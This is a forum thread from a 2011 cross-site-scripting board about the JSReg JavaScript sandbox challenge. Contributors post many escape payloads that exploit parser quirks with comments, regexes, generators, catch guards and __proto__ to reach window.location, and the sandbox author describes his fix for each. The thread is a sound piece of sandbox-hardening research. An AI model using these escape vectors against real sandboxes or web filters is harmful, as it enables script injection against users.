Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: JSReg sandbox challenge
Date: July 27, 2011 11:00AM

When was the last time you had an issue with the comment parsing?

alert-->0/*
(window[),('location'])/**/

The --> is only a comment IF there is a <!-- present before it.

Similarly for IE (using IE8, not sure about other versions):

alert<!--0[0]/*-->
(window[),('location'])/**/

Generator bugs:

[_ for(_ in 0)]
[/0/
for(_ in 0)]
[true for(_ in 0)]
[0 for(_ in 0)if(0)]
[[] for(_ in 0)]
[0 for($ in 0)for(_ in 0)]

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 3 time(s). Last edit at 07/27/2011 11:54AM by Jonas Magazinius.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 27, 2011 12:14PM

@Jonas

The reason is that the comments aren't removed when looking forward, so any forward checks will fail when the comments are removed, putting JSReg in a different state than the browser, as you and LeverOne cleverly highlighted :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: JSReg sandbox challenge
Date: July 27, 2011 12:37PM

Some problems with getters and setters:

+{get _()/'/+alert(window.location)}.$_$//'
({set _(_)/'/+alert(window.location)}).$_$=0//'

EDIT:

Another way to do the same thing:
({get _()/ /*/*/0/+alert(window[),('location'])})._//*/0})

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 07/27/2011 12:53PM by Jonas Magazinius.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 27, 2011 01:45PM

Ok here's the deal, I dropped get/set because there is no logic to handle curlyless get/set statements. I've fixed the escapes by emulating Webkit/Opera/FF behaviour, this treats <!-- as a comment regardless of whether it's valid syntax :(
Chrome/FF/Opera/Safari: 1<!--window === 1
IE: 1<!--window === false

The generator ones can't be fixed without detecting generators and knowing the context, since the automatic semi-colon insertion would fail for the following stuff:-

a=123;
a
for(var i=0;i<10;i++)1+1

I may add get/set in future and when I've worked out generator context I may add complete support too


Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 27, 2011 03:08PM

@Gareth
To emulate non-IE behavior (btw, the behaviors of GC/FF/Opera are also different) JSReg should delete everything after "<!--". At the moment, "-->" breaks the deleting.

1/<!--i-->/0/+
{x:1,
lo:{}/'/,alert(parent.location)//'}

----------------------
~Veritas~

Re: JSReg sandbox challenge
Date: July 27, 2011 03:13PM

I'm on a roll today..

this['__proto__']=window;
alert(this['location'])

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 27, 2011 07:42PM

Me === embarrassed I forgot this again =)
NiceWork++;


Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 27, 2011 07:57PM

In addition, the last fix has opened up the possibility of exploiting the old mistakes.

1</**/!--i+
{x:1,
lo:{}/'/,alert(parent.location)//'}


Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 07:04AM

Thanks very much for this awesome work!
Should be fixed now; the <!-- comment parser was out by one =) it didn't move the position to the end of the comment. I added "this" to the left check and put back the inline comment check in the output.


Re: JSReg sandbox challenge
Date: July 28, 2011 09:35AM

My latest bypass uses some JavaScript magic that I didn't even know about until today:

try{throw window}catch(x/**/ if(x)['location']='javascript:alert(window.location)'){}

Evaluating expressions inside the catch-variable definition.. Oh, and this is probably FF specific.

And btw, here's a way to make array comprehensions work again:
[_/**/ for(_ in[])]

And for..in loops are broken:
for([]in[]);
for({}in{});

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 4 time(s). Last edit at 07/28/2011 10:48AM by Jonas Magazinius.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 10:41AM

My mental js parser just went WTF, there's a Jonas in here.
That's crazy.

Quote

[_/**/ for(_ in[])]

Haha nice hack

Quote

And for..in loops are broken:
for([]in[]);
for({}in{});

Yeah, it requires some tweaking; I'm probably going to identify when you are inside a for-in statement.

THIS IS CRAZY LOL WTF AM I SUPPOSED TO DO
try{throw window}catch(xyz if(alert(xyz.location))){}




Edited 1 time(s). Last edit at 07/28/2011 10:56AM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 28, 2011 12:28PM

1/{'$lo$function':function(){return function()0}}.lo//
function()['constructor']('alert(parent.location)')()


Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 12:46PM

Your exploits just keep getting better :D I'll try and keep up with you...

* Fixed vector
* Added strict mode
* Assigned this to window




Edited 1 time(s). Last edit at 07/28/2011 12:55PM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 28, 2011 01:21PM

0?1:{'$lo$function':function(){return function()0}}.lo//
function()['constructor']('alert(parent.location)')()

Fix should be more radical. There are many more such bugs.




Edited 1 time(s). Last edit at 07/28/2011 01:30PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 02:01PM

@lever_one

Yeah, I've enforced a semi-colon before a detected block statement. This will not allow block statements with labels, but how useful are those anyway? Thanks!


Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 28, 2011 03:25PM

Artificial insertion (in this case ";") can be used to tell the difference between an obj. literal and a block:
insertion --> check syntax -->
A) if syntax error --> this is an obj. literal
B) if still valid syntax --> this is a block

The result is returned without the artificial insertion.
The advantage is not to modify the code structure.


Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 28, 2011 06:36PM

Awesome suggestion; I thought it might be a performance hit. We'll see how it goes. I've added it for every automatic semi-colon insertion too, not just the object literal/block statement now.




Edited 1 time(s). Last edit at 07/28/2011 06:52PM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 28, 2011 09:16PM

Now JSReg behaves correctly in some situations.

i+++
{}/i/i

for(;{}/i/i;)break; // for(;function(){}/i/i;)break; <-- still incorrect
// The artificial insertion can also be used to check whether this is a function or a func. expression (whether there is a reference to the function).

new old bug:

function lo()/**/{}/'/,alert(parent.location)//'




Edited 1 time(s). Last edit at 07/29/2011 06:50PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 29, 2011 08:35AM

@Lever_One

Won't that check fail for stuff like:-

if(1) {
function x() {
};<-- syntax error because if statement is not closed
}


Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 29, 2011 09:31AM

@Gareth

1. Insertion should always be done before the "function" (if it's about a function or f. expression) or before the opening bracket "{" (if it is about a block or object).
2. To check the syntax when you insert, all of the code has to be taken, not just part of it. Is it possible?

For example:

1.
if(1) {
;function x() { // <-- valid syntax ==> there is no reference to the function ==> /i/i will be treated as regexp
}/i/i
}

2.
x=(12,[],;function(){}/i/i,[]) // <-- syntax error ==> /i/i will be treated as division

3.

0?;function(){}:0 // <-- syntax error

4.

for(;;function(){};)break; // <-- syntax error

5.

switch (1) {case 1 : ;function x(){}} // <-- valid syntax

6.

if(0);function x(){} // <-- FAIL!!
else {}

7. (function();function(){})() // <-- FAIL :(

Perhaps in such cases we need to go back to the required brackets after "if", "else", "function".




Edited 7 time(s). Last edit at 08/01/2011 02:57PM by LeverOne.
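The artificial-insertion check LeverOne describes in this post and the earlier one (insert ";", re-parse the whole program, discard the probe so the real source is untouched), as an added example that is neither JSReg's code nor LeverOne's; it assumes new Function() in V8 stands in for the browser's parser and constructs its inputs from the cases in the thread.

```javascript
// Added example, not JSReg's own code: LeverOne's "artificial insertion" test.
// A ";" is inserted before the token in question and the WHOLE program is
// re-parsed; the probe is then discarded, so the caller's source is untouched.
// Assumption: new Function() (V8, sloppy mode) stands in for the browser's parser.
function parsesOk(src) {
  try {
    new Function(src); // parse only; the function is never called
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Insert ";" at idx and report whether the whole program still parses.
function probe(src, idx) {
  if (!parsesOk(src)) return 'invalid'; // a broken program cannot be classified
  return parsesOk(src.slice(0, idx) + ';' + src.slice(idx)) ? 'valid' : 'error';
}

// "{" at idx: still valid => block statement, syntax error => object literal.
function classifyBrace(src, idx) {
  if (src[idx] !== '{') throw new Error('expected "{" at ' + idx);
  const r = probe(src, idx);
  return r === 'invalid' ? r : (r === 'valid' ? 'block' : 'object');
}

// "function" at idx: still valid => declaration, syntax error => expression.
// Known false result (LeverOne's case 6): a sloppy-mode declaration used as the
// body of an if statement parses, but the inserted ";" detaches its else.
function classifyFunction(src, idx) {
  if (!src.startsWith('function', idx)) throw new Error('expected "function" at ' + idx);
  const r = probe(src, idx);
  return r === 'invalid' ? r : (r === 'valid' ? 'declaration' : 'expression');
}

// Constructed inputs taken from the thread; classified without modifying them.
const SAMPLES = [
  ['i+++\n{}/i/i', '{', 'object'],                    // {} is an operand, so /i/i divides
  ['for(;{}/i/i;)break;', '{', 'object'],
  ['if(1) {}', '{', 'block'],
  ['function x(){}', 'function', 'declaration'],
  ['1,function x(){}', 'function', 'expression'],
  ['x=(12,[],function(){}/i/i,[])', 'function', 'expression'],
];

function runSamples() {
  return SAMPLES.map(([src, tok, want]) => {
    const idx = src.indexOf(tok);
    const got = tok === '{' ? classifyBrace(src, idx) : classifyFunction(src, idx);
    return { src, want, got, ok: got === want };
  });
}
```

Every sample has to be parsed as a whole, which is the cost Gareth raises further down the thread: a single probe costs one full parse of the program.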

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 01, 2011 11:51AM

Sorry for the delay, I took some time to think about this. I've decided to enforce functions by using a semi-colon at the beginning and the end.

So for example :-
function x(){}

becomes:-
;function x(){};

Function expressions are modified with parens

so:
1,function x(){}

becomes:
1,(function x(){})

Which should enforce expressions without breaking anything. This way the syntax will break but should not result in a sandbox escape. I can then fix the syntax errors once the vector has been eliminated.

Syntax checking is hard, and although it was a really nice idea I'm not sure it will be possible, since it would require me to backtrack the code or look forward and parse multiple times. Patterns such as:-
(function(){

})();

Will always result in a syntax error unless the whole code is checked each time, I could store various locations where I placed a semi-colon and remove them before the final eval but it would be too slow IMO.




Edited 1 time(s). Last edit at 08/01/2011 11:52AM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: August 01, 2011 02:28PM

eval//
function x(){}/alert(window[),('location'])//lo

btw, one IE-vector by Jonas still alive...




Edited 2 time(s). Last edit at 08/01/2011 02:31PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 01, 2011 05:56PM

Quote

eval//
function x(){}/alert(window[),('location'])//lo

Hahah pretty damn awesome. Clever

Quote

btw, one IE-vector by Jonas still alive...

Thanks, I ran a test but must have missed IE.


Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 02, 2011 11:10AM

I've removed the old comment handling and modified the newer one to accept /**/ and //; comment processing now comes before rewriting. I did a check on old bugs and it seems to be good.


Re: JSReg sandbox challenge
Posted by: LeverOne
Date: August 02, 2011 10:46PM

//Safari 5.0.5 Win (and older versions of other browsers, which treat a regexp as a function)

/x/
function lo(){}/alert(window[),('location'])/1




Edited 2 time(s). Last edit at 08/03/2011 09:34AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 03, 2011 06:27AM

@LeverOne

Nice! I couldn't see the bug myself, as the latest version of Safari doesn't seem to allow it. But I fixed it by inserting a semi-colon after a regex if a function follows. I've also improved the eos insertion and spaces insertion to be slightly more clever about how they're inserted. Thanks! I keep hoping after every fix you won't be able to break it, yet you still do :D


Re: JSReg sandbox challenge
Posted by: LeverOne
Date: August 03, 2011 05:40PM

[[]][0]
++
{x:{}/lo//alert(window[),('location'])
}['x']


Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 04, 2011 06:23AM

Whoa, that one was amazing. I didn't know how to fix it, but since the eos insertion was working and this relies on the browser state being different than the JSReg state, I thought that when the comments are stripped I'd force a space after the detected regex if a "/" is detected after it, so that there is no confusion between the two.


Re: JSReg sandbox challenge
Posted by: LeverOne
Date: August 04, 2011 11:34AM

[[]][0]
++
{lo:{}/i/ /alert(window[),('location'])/i}['lo']


[[]][0]
++
{lo:{}/'/+alert(window[),("location"])+/'/i}['lo']


[[]][0]
++
{lo:{}/i/*alert(window[),('location'])*/-i/i}['lo']




Edited 2 time(s). Last edit at 08/04/2011 12:44PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: August 04, 2011 01:12PM

Man, so I close up hiding it in a comment and then you hide it in a regex lol, you're good. I track the starting square position, then when the ending square occurs I gather the contents of the object accessor and see if the syntax is valid. If the syntax isn't valid then an attack is occurring, since you've managed to inject an uneven ")". If you can somehow inject a valid-syntax-looking object accessor but still break out of the paren then you'll break it again.

:O awesome work

